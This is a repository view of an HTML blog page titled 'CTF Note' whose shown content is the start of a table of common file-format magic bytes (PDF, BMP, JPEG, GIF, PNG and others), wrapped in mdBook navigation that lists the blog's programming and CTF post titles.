dnrops
/
dnrops.gitlink.net
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
dnrops.gitlink.net/posts/ctf/CTF_Note.html

2982 lines
151 KiB
HTML
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<!DOCTYPE HTML>
<html lang="en" class="coal" dir="ltr">
<head>
<!-- Book generated using mdBook -->
<meta charset="UTF-8">
<title>CTF Note - Andrew&#x27;s Blog</title>
<!-- Custom HTML head -->
<meta name="description" content="Andrew Ryan&#x27;s Blog">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="theme-color" content="#ffffff">
<link rel="icon" href="../../favicon.svg">
<link rel="shortcut icon" href="../../favicon.png">
<link rel="stylesheet" href="../../css/variables.css">
<link rel="stylesheet" href="../../css/general.css">
<link rel="stylesheet" href="../../css/chrome.css">
<!-- Fonts -->
<link rel="stylesheet" href="../../FontAwesome/css/font-awesome.css">
<link rel="stylesheet" href="../../fonts/fonts.css">
<!-- Highlight.js Stylesheets -->
<link rel="stylesheet" href="../../highlight.css">
<link rel="stylesheet" href="../../tomorrow-night.css">
<link rel="stylesheet" href="../../ayu-highlight.css">
<!-- Custom theme stylesheets -->
<link rel="stylesheet" href="../../src/style/custom.css">
<!-- MathJax -->
<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
</head>
<body class="sidebar-visible no-js">
<div id="body-container">
<!-- Provide site root to javascript -->
<script>
var path_to_root = "../../";
var default_theme = window.matchMedia("(prefers-color-scheme: dark)").matches ? "coal" : "coal";
</script>
<!-- Work around some values being stored in localStorage wrapped in quotes -->
<script>
try {
var theme = localStorage.getItem('mdbook-theme');
var sidebar = localStorage.getItem('mdbook-sidebar');
if (theme.startsWith('"') && theme.endsWith('"')) {
localStorage.setItem('mdbook-theme', theme.slice(1, theme.length - 1));
}
if (sidebar.startsWith('"') && sidebar.endsWith('"')) {
localStorage.setItem('mdbook-sidebar', sidebar.slice(1, sidebar.length - 1));
}
} catch (e) { }
</script>
<!-- Set the theme before any content is loaded, prevents flash -->
<script>
var theme;
try { theme = localStorage.getItem('mdbook-theme'); } catch(e) { }
if (theme === null || theme === undefined) { theme = default_theme; }
var html = document.querySelector('html');
html.classList.remove('coal')
html.classList.add(theme);
var body = document.querySelector('body');
body.classList.remove('no-js')
body.classList.add('js');
</script>
<input type="checkbox" id="sidebar-toggle-anchor" class="hidden">
<!-- Hide / unhide sidebar before it is displayed -->
<script>
var body = document.querySelector('body');
var sidebar = null;
var sidebar_toggle = document.getElementById("sidebar-toggle-anchor");
if (document.body.clientWidth >= 1080) {
try { sidebar = localStorage.getItem('mdbook-sidebar'); } catch(e) { }
sidebar = sidebar || 'visible';
} else {
sidebar = 'hidden';
}
sidebar_toggle.checked = sidebar === 'visible';
body.classList.remove('sidebar-visible');
body.classList.add("sidebar-" + sidebar);
</script>
<nav id="sidebar" class="sidebar" aria-label="Table of contents">
<div class="sidebar-scrollbox">
<ol class="chapter"><li class="chapter-item affix "><a href="../../index.html">Andrew's Blog</a></li><li class="chapter-item "><a href="../../posts/linux/linux.html"><strong aria-hidden="true">1.</strong> linux</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/linux/install_linux.html"><strong aria-hidden="true">1.1.</strong> install linux</a></li><li class="chapter-item "><a href="../../posts/linux/bash_profile.html"><strong aria-hidden="true">1.2.</strong> bash profile</a></li><li class="chapter-item "><a href="../../posts/linux/command_list.html"><strong aria-hidden="true">1.3.</strong> command list</a></li><li class="chapter-item "><a href="../../posts/linux/git_guide.html"><strong aria-hidden="true">1.4.</strong> git guide</a></li><li class="chapter-item "><a href="../../posts/linux/tar.html"><strong aria-hidden="true">1.5.</strong> tar</a></li><li class="chapter-item "><a href="../../posts/linux/run_x86_elf_in_x64_setup.html"><strong aria-hidden="true">1.6.</strong> run x86 elf in x64 setup</a></li></ol></li><li class="chapter-item "><a href="../../posts/mac/mac.html"><strong aria-hidden="true">2.</strong> mac</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/mac/macos_profiles.html"><strong aria-hidden="true">2.1.</strong> macos profiles</a></li></ol></li><li class="chapter-item "><a href="../../posts/swift/swift.html"><strong aria-hidden="true">3.</strong> swift</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/swift/learn_swift.html"><strong aria-hidden="true">3.1.</strong> learn swift basics</a></li><li class="chapter-item "><a href="../../posts/swift/swift_extensions.html"><strong aria-hidden="true">3.2.</strong> Swift extensions</a></li><li class="chapter-item "><a href="../../posts/swift/swiftui_extension.html"><strong aria-hidden="true">3.3.</strong> SwiftUI extensions</a></li><li class="chapter-item "><a href="../../posts/swift/install_swift.html"><strong aria-hidden="true">3.4.</strong> install swift</a></li><li class="chapter-item "><a href="../../posts/swift/task_planner.html"><strong aria-hidden="true">3.5.</strong> implment task panner app with SwiftUI</a></li><li class="chapter-item "><a href="../../posts/swift/swift_cheat_sheet.html"><strong aria-hidden="true">3.6.</strong> Swift Cheat Sheet</a></li><li class="chapter-item "><a href="../../posts/swift/yinci_url.html"><strong aria-hidden="true">3.7.</strong> Personal privacy protocol</a></li><li class="chapter-item "><a href="../../posts/swift/swift_regular_exressions.html"><strong aria-hidden="true">3.8.</strong> Swift regular exressions</a></li><li class="chapter-item "><a href="../../posts/ios/how_to_create_beautiful_ios_charts_in_swift.html"><strong aria-hidden="true">3.9.</strong> How to Create Beautiful iOS Charts in鑱絊wift</a></li><li class="chapter-item "><a href="../../posts/swift/swiftui_source_code.html"><strong aria-hidden="true">3.10.</strong> SwiftUI source code</a></li><li class="chapter-item "><a href="../../posts/swift/use_swift_fetch_iciba_api.html"><strong aria-hidden="true">3.11.</strong> use swift fetch iciba API</a></li></ol></li><li class="chapter-item "><a href="../../posts/ios/ios.html"><strong aria-hidden="true">4.</strong> ios</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/ios/cocaposd_setup_and_install_for_ios_project.html"><strong aria-hidden="true">4.1.</strong> cocaposd setup and install for ios project</a></li><li class="chapter-item "><a href="../../posts/ios/swiftui_show_gif_image.html"><strong aria-hidden="true">4.2.</strong> SwiftUI show gif image</a></li><li class="chapter-item "><a href="../../posts/ios/implement_task_planner_app.html"><strong aria-hidden="true">4.3.</strong> implement Task planner App</a></li></ol></li><li class="chapter-item "><a href="../../posts/objective_c/objective_c.html"><strong aria-hidden="true">5.</strong> objective_c</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/objective_c/objective_c_cheat_sheet.html"><strong aria-hidden="true">5.1.</strong> Objective-C Cheat Sheet</a></li><li class="chapter-item "><a href="../../posts/objective_c/objective_c_for_absolute_beginners_read_note.html"><strong aria-hidden="true">5.2.</strong> Objective-C Note</a></li></ol></li><li class="chapter-item "><a href="../../posts/dart/dart.html"><strong aria-hidden="true">6.</strong> dart</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/dart/flutter.html"><strong aria-hidden="true">6.1.</strong> Flutter Cheat Sheet</a></li><li class="chapter-item "><a href="../../posts/dart/dart_cheat_sheet.html"><strong aria-hidden="true">6.2.</strong> Dart Cheat Sheet</a></li><li class="chapter-item "><a href="../../posts/flutter/flutter_dev_test.html"><strong aria-hidden="true">6.3.</strong> Flutter dev test</a></li></ol></li><li class="chapter-item "><a href="../../posts/rust/rust.html"><strong aria-hidden="true">7.</strong> rust</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/rust/offline_use_rust.html"><strong aria-hidden="true">7.1.</strong> Offline use rust</a></li><li class="chapter-item "><a href="../../posts/rust/rust_grammer.html"><strong aria-hidden="true">7.2.</strong> rust grammar</a></li><li class="chapter-item "><a href="../../posts/rust/pase_string_and_decimal_conversion.html"><strong aria-hidden="true">7.3.</strong> pase string and decimal conversion</a></li><li class="chapter-item "><a href="../../posts/rust/parse_types.html"><strong aria-hidden="true">7.4.</strong> rust types</a></li><li class="chapter-item "><a href="../../posts/rust/rust_life_cycle.html"><strong aria-hidden="true">7.5.</strong> Rust life cycle</a></li><li class="chapter-item "><a href="../../posts/rust/rust_generic.html"><strong aria-hidden="true">7.6.</strong> rust generics</a></li><li class="chapter-item "><a href="../../posts/rust/rust_implment_matrix.html"><strong aria-hidden="true">7.7.</strong> Rust implement matrix</a></li><li class="chapter-item "><a href="../../posts/rust/rust_sort.html"><strong aria-hidden="true">7.8.</strong> Rust implement sort algorithms</a></li><li class="chapter-item "><a href="../../posts/rust/implement_aes_encryption.html"><strong aria-hidden="true">7.9.</strong> Rust implement AEC encryption and decryption</a></li><li class="chapter-item "><a href="../../posts/rust/implement_trie_data_structure.html"><strong aria-hidden="true">7.10.</strong> implement trie data structure</a></li><li class="chapter-item "><a href="../../posts/rust/rust_implement_tree.html"><strong aria-hidden="true">7.11.</strong> implement tree data_structure</a></li><li class="chapter-item "><a href="../../posts/rust/list_dir.html"><strong aria-hidden="true">7.12.</strong> list dir</a></li><li class="chapter-item "><a href="../../posts/rust/fast_way_to_implment_object_trait.html"><strong aria-hidden="true">7.13.</strong> fast way to implment object trait</a></li><li class="chapter-item "><a href="../../posts/rust/compress_rust_binary_size.html"><strong aria-hidden="true">7.14.</strong> compress rust binary size</a></li><li class="chapter-item "><a href="../../posts/rust/implment_file_upload_backend.html"><strong aria-hidden="true">7.15.</strong> impliment file upload</a></li><li class="chapter-item "><a href="../../posts/rust/this_is_add_post_cli_implementation_in_rust.html"><strong aria-hidden="true">7.16.</strong> this is add_post cli implementation in rust</a></li><li class="chapter-item "><a href="../../posts/rust/use_rust_implment_a_copyclipbord_cli.html"><strong aria-hidden="true">7.17.</strong> Use rust implment a copyclipbord CLI</a></li><li class="chapter-item "><a href="../../posts/rust/sqlite_database_add_delete_update_show_in_rust.html"><strong aria-hidden="true">7.18.</strong> sqlite database add delete update show in rust</a></li><li class="chapter-item "><a href="../../posts/rust/implementing_tokio_joinhandle_for_wasm.html"><strong aria-hidden="true">7.19.</strong> Implementing tokio JoinHandle for wasm</a></li><li class="chapter-item "><a href="../../posts/rust/rust_implement_a_crate_for_encode_and_decode_brainfuck_and_ook.html"><strong aria-hidden="true">7.20.</strong> rust implement a crate for encode and decode brainfuck and ook</a></li><li class="chapter-item "><a href="../../posts/rust/slint_builtin_elements.html"><strong aria-hidden="true">7.21.</strong> Slint Builtin Elements</a></li><li class="chapter-item "><a href="../../posts/rust/corporate_network_install_rust_on_windows.html"><strong aria-hidden="true">7.22.</strong> Corporate network install Rust on windows</a></li><li class="chapter-item "><a href="../../posts/rust/rust_binary_file_how_to_judge_static_link_or_dynamic_link_in_macos.html"><strong aria-hidden="true">7.23.</strong> rust binary file how to judge static link or dynamic link in Macos</a></li><li class="chapter-item "><a href="../../posts/rust/rust_binary_include_dir_and_get_contents.html"><strong aria-hidden="true">7.24.</strong> rust binary include dir and get contents</a></li><li class="chapter-item "><a href="../../posts/rust/rust_logger_non-block.html"><strong aria-hidden="true">7.25.</strong> rust logger non-block</a></li><li class="chapter-item "><a href="../../posts/rust/rust_connect_sql_server_database.html"><strong aria-hidden="true">7.26.</strong> rust connect sql server database</a></li><li class="chapter-item "><a href="../../posts/rust/rust_websocket_implment.html"><strong aria-hidden="true">7.27.</strong> rust websocket implment</a></li></ol></li><li class="chapter-item "><a href="../../posts/java/java.html"><strong aria-hidden="true">8.</strong> java</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/java/java_grammar.html"><strong aria-hidden="true">8.1.</strong> java grammar and codewar</a></li><li class="chapter-item "><a href="../../posts/java/run_jar.html"><strong aria-hidden="true">8.2.</strong> java run .jar</a></li><li class="chapter-item "><a href="../../posts/java/java_pomxml_add_defaultgoal_to_build.html"><strong aria-hidden="true">8.3.</strong> Java pomxml add defaultGoal to build</a></li><li class="chapter-item "><a href="../../posts/java/java_set_mvn_mirror.html"><strong aria-hidden="true">8.4.</strong> Java set mvn mirror</a></li></ol></li><li class="chapter-item "><a href="../../posts/python/python.html"><strong aria-hidden="true">9.</strong> python</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/python/convert_pesn.html"><strong aria-hidden="true">9.1.</strong> convert pesn</a></li><li class="chapter-item "><a href="../../posts/python/find_remove_dir.html"><strong aria-hidden="true">9.2.</strong> find and remove dir</a></li><li class="chapter-item "><a href="../../posts/python/timing_message.html"><strong aria-hidden="true">9.3.</strong> wechat send message</a></li><li class="chapter-item "><a href="../../posts/python/use_python_openpyxl_package_read_and_edit_excel_files.html"><strong aria-hidden="true">9.4.</strong> Use python openpyxl package read and edit excel files</a></li></ol></li><li class="chapter-item "><a href="../../posts/go/go.html"><strong aria-hidden="true">10.</strong> go</a></li><li class="chapter-item "><a href="../../posts/js/js.html"><strong aria-hidden="true">11.</strong> js</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/js/js_tutorial.html"><strong aria-hidden="true">11.1.</strong> js tutorial</a></li><li class="chapter-item "><a href="../../posts/js/js_tutorial_map.html"><strong aria-hidden="true">11.2.</strong> ja map</a></li><li class="chapter-item "><a href="../../posts/js/js_tutorial_math.html"><strong aria-hidden="true">11.3.</strong> js math</a></li><li class="chapter-item "><a href="../../posts/js/js_tutorial_object.html"><strong aria-hidden="true">11.4.</strong> js object</a></li><li class="chapter-item "><a href="../../posts/js/js_tutorial_set.html"><strong aria-hidden="true">11.5.</strong> js set</a></li><li class="chapter-item "><a href="../../posts/js/single_thread_and_asynchronous.html"><strong aria-hidden="true">11.6.</strong> single thread and asynchronous</a></li><li class="chapter-item "><a href="../../posts/js/this.html"><strong aria-hidden="true">11.7.</strong> js this</a></li><li class="chapter-item "><a href="../../posts/js/js_implment_aes.html"><strong aria-hidden="true">11.8.</strong> js implment aes</a></li><li class="chapter-item "><a href="../../posts/js/getting_started_with_ajax.html"><strong aria-hidden="true">11.9.</strong> getting started with ajax</a></li><li class="chapter-item "><a href="../../posts/js/BinarySearchTree.html"><strong aria-hidden="true">11.10.</strong> binary search tree</a></li><li class="chapter-item "><a href="../../posts/js/goole_zx.html"><strong aria-hidden="true">11.11.</strong> goole zx</a></li><li class="chapter-item "><a href="../../posts/js/es6.html"><strong aria-hidden="true">11.12.</strong> es6</a></li></ol></li><li class="chapter-item "><a href="../../posts/ruby/ruby.html"><strong aria-hidden="true">12.</strong> ruby</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/ruby/rails_setup_env.html"><strong aria-hidden="true">12.1.</strong> ruby on rails setup environment</a></li><li class="chapter-item "><a href="../../posts/ruby/learn_ruby.html"><strong aria-hidden="true">12.2.</strong> learn ruby</a></li><li class="chapter-item "><a href="../../posts/ruby/ruby_note.html"><strong aria-hidden="true">12.3.</strong> Ruby Note</a></li><li class="chapter-item "><a href="../../posts/ruby/setup_ruby_for_ctf.html"><strong aria-hidden="true">12.4.</strong> Setup ruby for CTF</a></li></ol></li><li class="chapter-item "><a href="../../posts/react/react.html"><strong aria-hidden="true">13.</strong> react</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/react/react_life_cycle.html"><strong aria-hidden="true">13.1.</strong> react life cycle</a></li><li class="chapter-item "><a href="../../posts/react/react_router.html"><strong aria-hidden="true">13.2.</strong> react router</a></li><li class="chapter-item "><a href="../../posts/react/react_this.html"><strong aria-hidden="true">13.3.</strong> react this</a></li><li class="chapter-item "><a href="../../posts/react/react_interviw.html"><strong aria-hidden="true">13.4.</strong> react interview</a></li><li class="chapter-item "><a href="../../posts/react/important_react_interview.html"><strong aria-hidden="true">13.5.</strong> important react interview</a></li><li class="chapter-item "><a href="../../posts/react/react_quick_reference.html"><strong aria-hidden="true">13.6.</strong> react quick reference</a></li><li class="chapter-item "><a href="../../posts/react/redux_quick_reference.html"><strong aria-hidden="true">13.7.</strong> redux quick reference</a></li></ol></li><li class="chapter-item "><a href="../../posts/vue/vue.html"><strong aria-hidden="true">14.</strong> vue</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/vue/vue_ajax.html"><strong aria-hidden="true">14.1.</strong> vue ajax</a></li></ol></li><li class="chapter-item "><a href="../../posts/angular/angular.html"><strong aria-hidden="true">15.</strong> angular</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/angular/controller_communication.html"><strong aria-hidden="true">15.1.</strong> controller communication</a></li><li class="chapter-item "><a href="../../posts/angular/creating_custom_directives.html"><strong aria-hidden="true">15.2.</strong> creating custom directives</a></li><li class="chapter-item "><a href="../../posts/angular/directive_notes.html"><strong aria-hidden="true">15.3.</strong> directive notes</a></li><li class="chapter-item "><a href="../../posts/angular/directive_communication.html"><strong aria-hidden="true">15.4.</strong> directive communication</a></li><li class="chapter-item "><a href="../../posts/angular/post_params.html"><strong aria-hidden="true">15.5.</strong> post params</a></li><li class="chapter-item "><a href="../../posts/angular/read_json_angular.html"><strong aria-hidden="true">15.6.</strong> read json angular</a></li><li class="chapter-item "><a href="../../posts/angular/same_route_reload.html"><strong aria-hidden="true">15.7.</strong> same route reload</a></li></ol></li><li class="chapter-item "><a href="../../posts/css/css.html"><strong aria-hidden="true">16.</strong> css</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/css/use_css_media.html"><strong aria-hidden="true">16.1.</strong> use css media</a></li></ol></li><li class="chapter-item "><a href="../../posts/php/php.html"><strong aria-hidden="true">17.</strong> php</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/php/for_php_string_implment_some_extemtion_functions.html"><strong aria-hidden="true">17.1.</strong> for php string implment some extemtion functions</a></li><li class="chapter-item "><a href="../../posts/php/php_cheatsheet.html"><strong aria-hidden="true">17.2.</strong> PHP cheatsheet</a></li></ol></li><li class="chapter-item "><a href="../../posts/leetcode/leetcode.html"><strong aria-hidden="true">18.</strong> leetcode</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/leetcode/rust_leetcode.html"><strong aria-hidden="true">18.1.</strong> rust leetcode</a></li><li class="chapter-item "><a href="../../posts/leetcode/rust_codewar.html"><strong aria-hidden="true">18.2.</strong> rust codewar</a></li><li class="chapter-item "><a href="../../posts/leetcode/swift_codewar.html"><strong aria-hidden="true">18.3.</strong> swift codewar</a></li><li class="chapter-item "><a href="../../posts/leetcode/js_leetcode.html"><strong aria-hidden="true">18.4.</strong> js leetcode</a></li><li class="chapter-item "><a href="../../posts/leetcode/java_leetcode.html"><strong aria-hidden="true">18.5.</strong> java leetcode</a></li><li class="chapter-item "><a href="../../posts/leetcode/rust_huawei.html"><strong aria-hidden="true">18.6.</strong> huawei test</a></li><li class="chapter-item "><a href="../../posts/leetcode/rust_utils.html"><strong aria-hidden="true">18.7.</strong> rust common functions</a></li><li class="chapter-item "><a href="../../posts/leetcode/olympiad_training.html"><strong aria-hidden="true">18.8.</strong> Computer olympiad training</a></li></ol></li><li class="chapter-item expanded "><a href="../../posts/ctf/CTF.html"><strong aria-hidden="true">19.</strong> ctf</a><a class="toggle"><div></div></a></li><li><ol class="section"><li class="chapter-item expanded "><a href="../../posts/ctf/CTF_Note.html" class="active"><strong aria-hidden="true">19.1.</strong> CTF Note</a></li><li class="chapter-item "><a href="../../posts/ctf/0.1_Web.html"><strong aria-hidden="true">19.2.</strong> Web</a></li><li class="chapter-item "><a href="../../posts/ctf/4.1_Misc.html"><strong aria-hidden="true">19.3.</strong> Misc</a></li><li class="chapter-item "><a href="../../posts/ctf/3.2_PWN_note.html"><strong aria-hidden="true">19.4.</strong> PWN</a></li><li class="chapter-item "><a href="../../posts/ctf/3.1_Crypto.html"><strong aria-hidden="true">19.5.</strong> Crypto</a></li><li class="chapter-item "><a href="../../posts/ctf/3.4_RSA_note.html"><strong aria-hidden="true">19.6.</strong> Rsa attack</a></li><li class="chapter-item "><a href="../../posts/ctf/3.5_Base64.html"><strong aria-hidden="true">19.7.</strong> Base64</a></li><li class="chapter-item "><a href="../../posts/ctf/0.0_SQL Injection Cheatsheet.html"><strong aria-hidden="true">19.8.</strong> SQL Injection Cheatsheet</a></li><li class="chapter-item "><a href="../../posts/ctf/1.1_SQL_injection.html"><strong aria-hidden="true">19.9.</strong> SQL Injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.2_SQL_injection_UNION_attacks.html"><strong aria-hidden="true">19.10.</strong> SQL Injection UNION attacks</a></li><li class="chapter-item "><a href="../../posts/ctf/1.3_Blind SQL injection.html"><strong aria-hidden="true">19.11.</strong> Blind SQL Injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.4_Code Injection.html"><strong aria-hidden="true">19.12.</strong> Code Injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.5_SSRF.html"><strong aria-hidden="true">19.13.</strong> SSRF</a></li><li class="chapter-item "><a href="../../posts/ctf/1.6_OS command injection.html"><strong aria-hidden="true">19.14.</strong> OS command injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.7_Local file inclusion.html"><strong aria-hidden="true">19.15.</strong> Local file inclusion</a></li><li class="chapter-item "><a href="../../posts/ctf/1.8_Remote file inclusion.html"><strong aria-hidden="true">19.16.</strong> Remote file inclusion</a></li><li class="chapter-item "><a href="../../posts/ctf/1.9_CSRFm.html"><strong aria-hidden="true">19.17.</strong> CSRF</a></li><li class="chapter-item "><a href="../../posts/ctf/1.10_NoSQL injection.html"><strong aria-hidden="true">19.18.</strong> NoSQL injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.11_JSON injection.html"><strong aria-hidden="true">19.19.</strong> JSON injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.12_CTF_Web_SQL_Note.html"><strong aria-hidden="true">19.20.</strong> CTF Web SQL Note</a></li><li class="chapter-item "><a href="../../posts/ctf/2.1_XXE.html"><strong aria-hidden="true">19.21.</strong> XXE</a></li><li class="chapter-item "><a href="../../posts/ctf/2.2_XSS.html"><strong aria-hidden="true">19.22.</strong> XSS</a></li><li class="chapter-item "><a href="../../posts/ctf/2.3_Upload File.html"><strong aria-hidden="true">19.23.</strong> Upload File</a></li><li class="chapter-item "><a href="../../posts/ctf/2.4_serialize_unserialize.html"><strong aria-hidden="true">19.24.</strong> serialize unserialize</a></li><li class="chapter-item "><a href="../../posts/ctf/2.5_Race condition.html"><strong aria-hidden="true">19.25.</strong> Race condition</a></li><li class="chapter-item "><a href="../../posts/ctf/3.2_PWN_note.html"><strong aria-hidden="true">19.26.</strong> PWN_note</a></li><li class="chapter-item "><a href="../../posts/ctf/3.3_pwn HCTF2016 brop.html"><strong aria-hidden="true">19.27.</strong> pwn HCTF2016 brop</a></li><li class="chapter-item "><a href="../../posts/ctf/pwn_patch_defense_skill.html"><strong aria-hidden="true">19.28.</strong> PWN Patch defense skill</a></li><li class="chapter-item "><a href="../../posts/ctf/pwn_stack_overflow.html"><strong aria-hidden="true">19.29.</strong> PWN stack overflow</a></li><li class="chapter-item "><a href="../../posts/ctf/pwn_heap_overflow.html"><strong aria-hidden="true">19.30.</strong> PWN heap overflow</a></li><li class="chapter-item "><a href="../../posts/ctf/pwn_format_string_vulnerability.html"><strong aria-hidden="true">19.31.</strong> PWN Format String Vulnerability</a></li><li class="chapter-item "><a href="../../posts/ctf/kali_linux_tutorials.html"><strong aria-hidden="true">19.32.</strong> Kali linux tutorials</a></li><li class="chapter-item "><a href="../../posts/ctf/google_dorks_2023_lists.html"><strong aria-hidden="true">19.33.</strong> Google Dorks 2023 Lists</a></li><li class="chapter-item "><a href="../../posts/ctf/dvwa_writeup.html"><strong aria-hidden="true">19.34.</strong> DVWA WriteUp</a></li><li class="chapter-item "><a href="../../posts/ctf/bwapp_writeup.html"><strong aria-hidden="true">19.35.</strong> bWAPP WriteUp</a></li><li class="chapter-item "><a href="../../posts/ctf/sqlilabs_writeup.html"><strong aria-hidden="true">19.36.</strong> sqlilabs WriteUp</a></li><li class="chapter-item "><a href="../../posts/ctf/ctf_train_at_hangzhou.html"><strong aria-hidden="true">19.37.</strong> ctf train at hangzhou</a></li><li class="chapter-item "><a href="../../posts/ctf/ctf_common_mindmap_list.html"><strong aria-hidden="true">19.38.</strong> ctf common mindmap list</a></li><li class="chapter-item "><a href="../../posts/ctf/error_based_sql_injection.html"><strong aria-hidden="true">19.39.</strong> Error Based SQL Injection</a></li><li class="chapter-item "><a href="../../posts/ctf/urlfinder_tutorial.html"><strong aria-hidden="true">19.40.</strong> URLFinder Tutorial</a></li><li class="chapter-item "><a href="../../posts/ctf/observer_ward_tutorial.html"><strong aria-hidden="true">19.41.</strong> observer_ward Tutorial</a></li><li class="chapter-item "><a href="../../posts/ctf/mysql_udf_.html"><strong aria-hidden="true">19.42.</strong> MySQL UDF 提权</a></li><li class="chapter-item "><a href="../../posts/ctf/nuclei__tutorial.html"><strong aria-hidden="true">19.43.</strong> Nuclei Tutorial</a></li><li class="chapter-item "><a href="../../posts/ctf/2024_ctf_solution_thinking.html"><strong aria-hidden="true">19.44.</strong> 2024 ctf solution thinking</a></li><li class="chapter-item "><a href="../../posts/ctf/man_che_si_te_bian_ma.html"><strong aria-hidden="true">19.45.</strong> 曼彻斯特编码</a></li></ol></li></ol>
</div>
<div id="sidebar-resize-handle" class="sidebar-resize-handle">
<div class="sidebar-resize-indicator"></div>
</div>
</nav>
<!-- Track and set sidebar scroll position -->
<script>
var sidebarScrollbox = document.querySelector('#sidebar .sidebar-scrollbox');
sidebarScrollbox.addEventListener('click', function(e) {
if (e.target.tagName === 'A') {
sessionStorage.setItem('sidebar-scroll', sidebarScrollbox.scrollTop);
}
}, { passive: true });
var sidebarScrollTop = sessionStorage.getItem('sidebar-scroll');
sessionStorage.removeItem('sidebar-scroll');
if (sidebarScrollTop) {
// preserve sidebar scroll position when navigating via links within sidebar
sidebarScrollbox.scrollTop = sidebarScrollTop;
} else {
// scroll sidebar to current active section when navigating via "next/previous chapter" buttons
var activeSection = document.querySelector('#sidebar .active');
if (activeSection) {
activeSection.scrollIntoView({ block: 'center' });
}
}
</script>
<div id="page-wrapper" class="page-wrapper">
<div class="page">
<div id="menu-bar-hover-placeholder"></div>
<div id="menu-bar" class="menu-bar sticky">
<div class="left-buttons">
<label id="sidebar-toggle" class="icon-button" for="sidebar-toggle-anchor" title="Toggle Table of Contents" aria-label="Toggle Table of Contents" aria-controls="sidebar">
<i class="fa fa-bars"></i>
</label>
<button id="theme-toggle" class="icon-button" type="button" title="Change theme" aria-label="Change theme" aria-haspopup="true" aria-expanded="false" aria-controls="theme-list">
<i class="fa fa-paint-brush"></i>
</button>
<ul id="theme-list" class="theme-popup" aria-label="Themes" role="menu">
<li role="none"><button role="menuitem" class="theme" id="light">Light</button></li>
<li role="none"><button role="menuitem" class="theme" id="rust">Rust</button></li>
<li role="none"><button role="menuitem" class="theme" id="coal">Coal</button></li>
<li role="none"><button role="menuitem" class="theme" id="navy">Navy</button></li>
<li role="none"><button role="menuitem" class="theme" id="ayu">Ayu</button></li>
</ul>
<button id="search-toggle" class="icon-button" type="button" title="Search. (Shortkey: s)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="S" aria-controls="searchbar">
<i class="fa fa-search"></i>
</button>
</div>
<h1 class="menu-title">Andrew&#x27;s Blog</h1>
<div class="right-buttons">
<a href="https://gitlink.org.cn/dnrops/dnrops.gitlink.net.git" title="Git repository" aria-label="Git repository">
<i id="git-repository-button" class="fa fa-github"></i>
</a>
</div>
</div>
<div id="search-wrapper" class="hidden">
<form id="searchbar-outer" class="searchbar-outer">
<input type="search" id="searchbar" name="searchbar" placeholder="Search this book ..." aria-controls="searchresults-outer" aria-describedby="searchresults-header">
</form>
<div id="searchresults-outer" class="searchresults-outer hidden">
<div id="searchresults-header" class="searchresults-header"></div>
<ul id="searchresults">
</ul>
</div>
</div>
<!-- Apply ARIA attributes after the sidebar and the sidebar toggle button are added to the DOM -->
<script>
document.getElementById('sidebar-toggle').setAttribute('aria-expanded', sidebar === 'visible');
document.getElementById('sidebar').setAttribute('aria-hidden', sidebar !== 'visible');
Array.from(document.querySelectorAll('#sidebar a')).forEach(function(link) {
link.setAttribute('tabIndex', sidebar === 'visible' ? 0 : -1);
});
</script>
<div id="content" class="content">
<main>
<h1 id="ctf-note"><a class="header" href="#ctf-note">CTF Note</a></h1>
<h2 id="常见文件头部-magic-bytes"><a class="header" href="#常见文件头部-magic-bytes">常见文件头部 Magic Bytes</a></h2>
<div class="table-wrapper"><table><thead><tr><th>描述</th><th>扩展名</th><th>Magic Number</th></tr></thead><tbody>
<tr><td>Adobe Illustrator</td><td>.ai</td><td>25 50 44 46 [%PDF]</td></tr>
<tr><td>Bitmap graphic</td><td>.bmp</td><td>42 4D [BM]</td></tr>
<tr><td>Class File</td><td>.class</td><td>CA FE BA BE</td></tr>
<tr><td>JPEG graphic file</td><td>.jpg</td><td>FF D8</td></tr>
<tr><td>JPEG 2000 graphic file</td><td>.jp2</td><td>0000000C6A5020200D0A [….jP..]</td></tr>
<tr><td>GIF graphic file</td><td>.gif</td><td>47 49 46 38 [GIF89]</td></tr>
<tr><td>TIF graphic file</td><td>.tif</td><td>49 49 [II]</td></tr>
<tr><td>PNG graphic file</td><td>.png</td><td>89 50 4E 47 .PNG</td></tr>
